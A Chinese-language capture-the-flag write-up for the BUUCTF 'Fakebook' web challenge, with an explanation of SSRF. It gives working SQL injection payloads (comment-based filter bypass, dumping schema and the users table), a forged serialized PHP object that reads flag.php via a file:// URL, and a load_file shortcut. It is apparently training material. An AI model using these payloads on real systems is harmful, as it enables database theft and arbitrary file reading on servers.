BUUCTF [网鼎杯 2018]Fakebook 1

BUUCTF [网鼎杯 2018]Fakebook 1

join(注册)一个账号,按用户名进入主页
发现注入点no

no=1 order by 4#没事

no=1 order by 5#报错，有4列

no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 

回显位是2，注意到有反序列化函数。
爆表名

no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() 

爆属性列

no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='users'

爆字段

no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users

11233c9909afec25354d551dae21590bb26e38d53f2173b8d3dc3eee4c047e7ab1c1eb8b85103e3be7ba613b31bb5c9c36214dc9f14a42fd7a2fdb84856bca5c44c2O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:123;s:4:"blog";s:7:"bai.com";}
robots.txt查出源码

下载

<?php


class UserInfo
{
     
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
     
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
     
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
     
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
     
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
     
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

这部分可能存在ssrf

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF是要目标网站的内部系统。（因为他是从内部系统访问的，所有可以通过它攻击外网无法访问的内部系统，也就是把目标网站当中间人）

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能，且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，文档，等等。

举例 ： A网站，是一个所有人都可以访问的外网网站，B网站是一个他们内部的OA网站。
所以，我们普通用户只可以访问a网站，不能访问b网站。但是我们可以同过a网站做中间人，访问b网站，从而达到攻击b网站需求。

具体可参考SSRF漏洞是如何产生的？

在这题，查看源码发现data字段存在漏洞。

对应网页的博客内容

而我们爆出的字段data是序列化后的字符串

O:8:"UserInfo":3:{
     s:4:"name";s:3:"123";s:3:"age";i:123;s:4:"blog";s:7:"bai.com";}

说明注册时会序列化我们的信息，回显到页面时再反序列化。
这个data本来回显的是我们自己的博客，但我们把它改为回显flag.php就可以构成ssrf
修改自己最后blog字段内容，改为file:///var/www/html/flag.php，并把对应的s改为对应长度29

O:8:"UserInfo":3:{
     s:4:"name";s:3:"123";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

data字段在第4位，所以放在第4位。
构造payload

no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

看源码，点击blog的链接

得到flag

非预期解：

因为sql注入没有过滤load_file，直接取得flag
payload

no=-1 union/**/select 1,load_file("/var/www/html/flag.php"),3,4

看源码

提问：flag.php的路径是怎么知道的？